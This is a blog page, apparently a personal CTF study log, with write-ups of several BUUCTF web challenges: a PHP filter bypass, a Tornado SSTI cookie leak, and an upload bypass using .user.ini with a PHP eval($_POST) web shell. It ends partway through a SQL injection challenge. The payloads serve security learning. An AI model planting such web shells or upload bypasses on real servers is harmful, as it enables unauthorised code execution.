

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/2.png">
  <link rel="icon" href="/img/2.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <meta name="description" content="BUUCTF有点乱，之前在等博客开通。 [RoarCTF 2019]Easy Calc配置了好久的图床，之前用hexo+github的服务器搭建博客。现在重新用vps搭建博客，是真的麻烦，还要申请备案啥的。给自己取了一个好听的id名—-Xsw6_a，但是很难受，因为很多时候下划线(_)，是非法字符。先来做做这个比较简单的题嘿嘿。emmm又要重新启动一下环境。先来看看源代码。 值得注意的几点。1.I">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF">
<meta property="og:url" content="http://example.com/2022/02/27/BUUCTF/index.html">
<meta property="og:site_name" content="Xsw6_a">
<meta property="og:description" content="BUUCTF有点乱，之前在等博客开通。 [RoarCTF 2019]Easy Calc配置了好久的图床，之前用hexo+github的服务器搭建博客。现在重新用vps搭建博客，是真的麻烦，还要申请备案啥的。给自己取了一个好听的id名—-Xsw6_a，但是很难受，因为很多时候下划线(_)，是非法字符。先来做做这个比较简单的题嘿嘿。emmm又要重新启动一下环境。先来看看源代码。 值得注意的几点。1.I">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209579.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220214132112.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209866.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209280.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209059.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209239.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209238.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220214140724.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209416.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209537.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209473.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210762.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209510.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210065.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210618.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210160.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210434.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210005.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220218183715.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210449.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210428.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210962.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210449.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210648.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220215144143.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210486.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210881.png">
<meta property="article:published_time" content="2022-02-27T04:11:47.000Z">
<meta property="article:modified_time" content="2022-03-26T04:13:56.270Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209579.png">
  
  <title>BUUCTF - Xsw6_a</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>热爱使我从未停下脚步</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-about-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/1.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="BUUCTF">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-02-27 12:11" pubdate>
        2022年2月27日 中午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      17k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      54 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">BUUCTF</h1>
            
            <div class="markdown-body">
              <h1 id="BUUCTF"><a href="#BUUCTF" class="headerlink" title="BUUCTF"></a>BUUCTF</h1><p>有点乱，之前在等博客开通。</p>
<h2 id="RoarCTF-2019-Easy-Calc"><a href="#RoarCTF-2019-Easy-Calc" class="headerlink" title="[RoarCTF 2019]Easy Calc"></a>[RoarCTF 2019]Easy Calc</h2><p>配置了好久的图床，之前用hexo+github的服务器搭建博客。现在重新用vps搭建博客，是真的麻烦，还要申请备案啥的。<br>给自己取了一个好听的id名—-Xsw6_a，但是很难受，因为很多时候下划线(_)，是非法字符。<br>先来做做这个比较简单的题嘿嘿。<br>emmm又要重新启动一下环境。<br>先来看看源代码。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209579.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214131745"></p>
<p>值得注意的几点。<br><strong>1.I’ve set up WAF to ensure security.</strong></p>
<p><strong>2.calc.php</strong></p>
<p>进入链接：<a target="_blank" rel="noopener" href="http://node4.buuoj.cn:27894/calc.php">http://node4.buuoj.cn:27894/calc.php</a></p>
<p>读取代码：<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220214132112.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214132112"></p>
<p>这里对我来说的新知识，了解一下foreach函数。（菜鸟教程）<br>正则过滤了一些字符。<br>构造num&#x3D;print_r(scandir(chr(47))),发现报错。<br>emmm….不会了。百度。<br>只需要将num之前打一个空格。<br>新链接：<a target="_blank" rel="noopener" href="http://node4.buuoj.cn:27894/calc.php">http://node4.buuoj.cn:27894/calc.php</a>? num&#x3D;print_r(scandir(chr(47)))<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209866.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214133023"></p>
<p>读取f1agg。<br>这里附上字符串转ascii的java代码，就当复习java基础语法了。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Test</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> &#123;<br>        <span class="hljs-type">String</span> <span class="hljs-variable">a</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;/f1agg&quot;</span>;<br>        <span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i=<span class="hljs-number">0</span>;i&lt;a.length();i++)&#123;<br>            <span class="hljs-type">int</span> temp=(<span class="hljs-type">int</span>)a.charAt(i);<br>            <span class="hljs-comment">//得到当前字符的ascii</span><br>            System.out.println(temp);<br>        &#125;<br><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>完整链接：<a target="_blank" rel="noopener" href="http://node4.buuoj.cn:27894/calc.php">http://node4.buuoj.cn:27894/calc.php</a>? num&#x3D;print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))<br>得到flag。</p>
<h2 id="护网杯-2018-easy-tornado"><a href="#护网杯-2018-easy-tornado" class="headerlink" title="[护网杯 2018]easy_tornado"></a>[护网杯 2018]easy_tornado</h2><p>随便点点发现url中<a target="_blank" rel="noopener" href="http://0ecb6975-05d4-486c-819b-733d862e600c.node4.buuoj.cn:81/file?filename=/flag.txt&amp;filehash=7e8d78ce04c76c46dbe7fcee211c3aed">http://0ecb6975-05d4-486c-819b-733d862e600c.node4.buuoj.cn:81/file?filename=/flag.txt&amp;filehash=7e8d78ce04c76c46dbe7fcee211c3aed</a><br>filehash的值，emmm第一眼就觉得是加密。<br>接着发现<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209280.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214134238"></p>
<p>直接上加密。<br>但是找了一圈没有找到cookie。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209059.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214134456"></p>
<p>回头又想到render。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209239.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214135041"></p>
<p>没有思路，就又查找wp了。<br>很奇妙，竟然联系到题目。跟着wp提示做一下。<br>一路跟到底…emmm<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209238.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214140206"></p>
<p><strong>总结：handler 指向RequestHandler</strong></p>
<p><strong>而RequestHandler.settings又指向self.application.settings</strong></p>
<p><strong>所有handler.settings就指向RequestHandler.application.settings了！</strong></p>
<p>这里如果直接访问，会出现500的错误。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220214140724.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214140724"></p>
<p>所以这里就体现出了，为什么要间接访问。<br>然后自己调试的一些问题：这里好像链接构造成：0ecb6975-05d4-486c-819b-733d862e600c.node4.buuoj.cn:81&#x2F;error?msg&#x3D;</p>
<p>msg后面输入什么，页面就会返回什么。跟作者说的ssti我觉得有问题。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209416.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220214141140"></p>
<p>这里如果是计算表达式就是不行。但是这里确实是符合ssti，emmm不理解。</p>
<p>管他呢，继续做叭。<br>构造链接：<a target="_blank" rel="noopener" href="http://0ecb6975-05d4-486c-819b-733d862e600c.node4.buuoj.cn:81/error?msg=">http://0ecb6975-05d4-486c-819b-733d862e600c.node4.buuoj.cn:81/error?msg=</a></p>
<p>得到cookie，然后就去写代码咯。自己对着敲一遍。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><br><span class="hljs-built_in">hash</span> = hashlib.md5()<br><span class="hljs-comment">#创建MD5加密对象</span><br><span class="hljs-built_in">hash</span>.update(<span class="hljs-string">&quot;/fllllllllllllag&quot;</span>.encode(<span class="hljs-string">&#x27;UTF-8&#x27;</span>))<br><span class="hljs-comment">#更新对象要加密的字符串，要先UTF-8编码成二进制，因为md5只加密二进制</span><br>s1=<span class="hljs-built_in">hash</span>.hexdigest()<br><span class="hljs-built_in">hash</span> = hashlib.md5()<br><span class="hljs-built_in">hash</span>.update((<span class="hljs-string">&quot;20d70faf-6981-4604-ba00-9f57cb0c2569&quot;</span>+s1).encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hash</span>.hexdigest())<br></code></pre></td></tr></table></figure>

<p>就是注释md5加密又学到知识了。</p>
<p>最终链接:<a target="_blank" rel="noopener" href="http://0ecb6975-05d4-486c-819b-733d862e600c.node4.buuoj.cn:81/file?filename=/fllllllllllllag&amp;filehash=cb968bb0bf9e59ccb66e18a9ed1a6674">http://0ecb6975-05d4-486c-819b-733d862e600c.node4.buuoj.cn:81/file?filename=/fllllllllllllag&amp;filehash=cb968bb0bf9e59ccb66e18a9ed1a6674</a></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>1、如果url中参数屏蔽了字母，可在参数前+一个小空格。</p>
<p>2、scandir、print_f、file_get_contents等函数</p>
<p>3、看到render参数可联系到模板，联系到ssti，Tornado提供别名快速访问对象。</p>
<p>4、RequestHandler.application.settings目前不知道具体作用，中文翻译一下  请求处理程序 .申请.设置 估摸这就是查看cookie？</p>
<p>当然这里直接通过 handler.settings。</p>
<h2 id="SUCTF-2019-CheckIn"><a href="#SUCTF-2019-CheckIn" class="headerlink" title="[SUCTF 2019]CheckIn"></a>[SUCTF 2019]CheckIn</h2><p>打开题目是上传文件。有源码先看源码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">&lt;?php<br>// error_reporting(0);<br>$userdir = &quot;uploads/&quot; . md5($_SERVER[&quot;REMOTE_ADDR&quot;]);<br>if (!file_exists($userdir)) &#123;<br>    mkdir($userdir, 0777, true);<br>&#125;<br>file_put_contents($userdir . &quot;/index.php&quot;, &quot;&quot;);<br>if (isset($_POST[&quot;upload&quot;])) &#123;<br>    $tmp_name = $_FILES[&quot;fileUpload&quot;][&quot;tmp_name&quot;];<br>    $name = $_FILES[&quot;fileUpload&quot;][&quot;name&quot;];<br>    if (!$tmp_name) &#123;<br>        die(&quot;filesize too big!&quot;);<br>    &#125;<br>    if (!$name) &#123;<br>        die(&quot;filename cannot be empty!&quot;);<br>    &#125;<br>    $extension = substr($name, strrpos($name, &quot;.&quot;) + 1);<br>    if (preg_match(&quot;/ph|htacess/i&quot;, $extension)) &#123;<br>        die(&quot;illegal suffix!&quot;);<br>    &#125;<br>    if (mb_strpos(file_get_contents($tmp_name), &quot;&lt;?&quot;) !== FALSE) &#123;<br>        die(&quot;&amp;lt;? in contents!&quot;);<br>    &#125;<br>    $image_type = exif_imagetype($tmp_name);<br>    if (!$image_type) &#123;<br>        die(&quot;exif_imagetype:not image!&quot;);<br>    &#125;<br>    $upload_file_path = $userdir . &quot;/&quot; . $name;<br>    move_uploaded_file($tmp_name, $upload_file_path);<br>    echo &quot;Your dir &quot; . $userdir. &#x27; &lt;br&gt;&#x27;;<br>    echo &#x27;Your files : &lt;br&gt;&#x27;;<br>    var_dump(scandir($userdir));<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209537.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220222210628"></p>
<p>过滤了 <strong>&lt;?</strong><br>然后可以上传图像类型的文件。<br>这里就让我想到了上传.htacess，但是文章中也是过滤掉了。<br>(这里就走头无路了，看看wp，提示到apache是可以用.htacess，而这里用的服务器niginx)</p>
<p>优势：跟<code>.htaccess</code>后门比，适用范围更广，nginx&#x2F;apache&#x2F;IIS都有效，而<code>.htaccess</code>只适用于apache</p>
<h3 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h3><p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209473.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220222211627"></p>
<p>也就是说我们可以在<code>.user.ini</code>中设置<code>php.ini</code>中<strong>PHP_INI_PERDIR</strong> 和 <strong>PHP_INI_USER</strong> 模式的 INI 设置，而且只要是在使用 <strong>CGI／FastCGI</strong> 模式的服务器上都可以使用<code>.user.ini</code></p>
<p>在p牛的文章中提到了两个有趣的设置：<strong>auto_prepend_file</strong>和<strong>auto_append_file</strong></p>
<p>我们再到手册中看了下这两个设置的定义：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210762.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220222212237"></p>
<p>大致意思就是：我们指定一个文件（如a.jpg），那么该文件就会被包含在要执行的php文件中（如index.php），类似于在index.php中插入一句：<code>require(./a.jpg);</code>（这里就是为什么要写入跟上传文件的图片一个命名的原因。）</p>
<p>这两个设置的区别只是在于<strong>auto_prepend_file</strong>是在文件前插入；<strong>auto_append_file</strong>在文件最后插入（当文件调用的有<code>exit()</code>时该设置无效）。</p>
<h3 id="解题步骤（方法一）"><a href="#解题步骤（方法一）" class="headerlink" title="解题步骤（方法一）"></a>解题步骤（方法一）</h3><p>1、上传.user.ini</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">GIF89a<br><span class="hljs-attribute">auto_prepend_file</span>=a.jpg<br></code></pre></td></tr></table></figure>

<p>2、上传a.jpg</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs xml">GIF89a<br><span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">language</span>=<span class="hljs-string">&quot;php&quot;</span>&gt;</span><span class="language-javascript"><span class="hljs-built_in">eval</span>($_POST[<span class="hljs-string">&#x27;a&#x27;</span>]);</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>3、访问上传的文件路径。<strong>upload&#x2F;md5(*)</strong><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261209510.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220222212917"></p>
<p>得到flag。</p>
<h3 id="绕过exif-imagetype-的奇技淫巧（解题方法二）"><a href="#绕过exif-imagetype-的奇技淫巧（解题方法二）" class="headerlink" title="绕过exif_imagetype()的奇技淫巧（解题方法二）"></a>绕过<code>exif_imagetype()</code>的奇技淫巧（解题方法二）</h3><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">define</span> width 20</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> height 10</span><br></code></pre></td></tr></table></figure>

<p>采用xbm格式X Bit Map，绕过exif_imagetype()方法的检测，上传文件来解析。<br> 在计算机图形学中，X Window系统使用X BitMap，一种纯文本二进制图像格式，用于存储X GUI中使用的光标和图标位图。<br> XBM数据由一系列包含单色像素数据的静态无符号字符数组组成，当格式被普遍使用时，XBM通常出现在标题.h文件中，每个图像在标题中存储一个数组。<br> 也就是用c代码来标识一个xbm文件，前两个#defines指定位图的高度和宽度【以像素为单位，比如以下xbm文件：<br> <code>#define test_width 16</code><br> <code>#define test_height 7</code></p>
<p>只需将上述文件中的GIF89a改为 </p>
<p>#define width 20</p>
<p>#define height 10</p>
<p>即可。</p>
<h2 id="GXYCTF2019-BabySQli"><a href="#GXYCTF2019-BabySQli" class="headerlink" title="[GXYCTF2019]BabySQli"></a>[GXYCTF2019]BabySQli</h2><p>尝试很多次都是失败。然后突然发现。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210065.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220223162344"></p>
<p>这是一个什么编码呢？尝试许久不知道。查了查wp。是base32。然后是base64。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">where</span> username <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;$name&#x27;</span><br></code></pre></td></tr></table></figure>

<p>但是还是没有思路。因为根本绕不过。肯定还有别的校验。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">&lt;!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--&gt;<br>&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt; <br>&lt;title&gt;Do you know who am I?&lt;/title&gt;<br>&lt;?php<br>require &quot;config.php&quot;;<br>require &quot;flag.php&quot;;<br><br>// 去除转义<br>if (get_magic_quotes_gpc()) &#123;<br>	function stripslashes_deep($value)<br>	&#123;<br>		$value = is_array($value) ?<br>		array_map(&#x27;stripslashes_deep&#x27;, $value) :<br>		stripslashes($value);<br>		return $value;<br>	&#125;<br><br>	$_POST = array_map(&#x27;stripslashes_deep&#x27;, $_POST);<br>	$_GET = array_map(&#x27;stripslashes_deep&#x27;, $_GET);<br>	$_COOKIE = array_map(&#x27;stripslashes_deep&#x27;, $_COOKIE);<br>	$_REQUEST = array_map(&#x27;stripslashes_deep&#x27;, $_REQUEST);<br>&#125;<br><br>mysqli_query($con,&#x27;SET NAMES UTF8&#x27;);<br>$name = $_POST[&#x27;name&#x27;];<br>$password = $_POST[&#x27;pw&#x27;];<br>$t_pw = md5($password);<br>$sql = &quot;select * from user where username = &#x27;&quot;.$name.&quot;&#x27;&quot;;<br>// echo $sql;<br>$result = mysqli_query($con, $sql);<br><br><br>if(preg_match(&quot;/\(|\)|\=|or/&quot;, $name))&#123;<br>	die(&quot;do not hack me!&quot;);<br>&#125;<br>else&#123;<br>	if (!$result) &#123;<br>		printf(&quot;Error: %s\n&quot;, mysqli_error($con));<br>		exit();<br>	&#125;<br>	else&#123;<br>		// echo &#x27;&lt;pre&gt;&#x27;;<br>		$arr = mysqli_fetch_row($result);<br>		// print_r($arr);<br>		if($arr[1] == &quot;admin&quot;)&#123;<br>			if(md5($password) == $arr[2])&#123;<br>				echo $flag;<br>			&#125;<br>			else&#123;<br>				die(&quot;wrong pass!&quot;);<br>			&#125;<br>		&#125;<br>		else&#123;<br>			die(&quot;wrong user!&quot;);<br>		&#125;<br>	&#125;<br>&#125;<br><br>?&gt;<br><br></code></pre></td></tr></table></figure>

<p>1、在name中过滤了一些字符以及or。</p>
<p>2、mysqli_query（）对数据库进行一次查询</p>
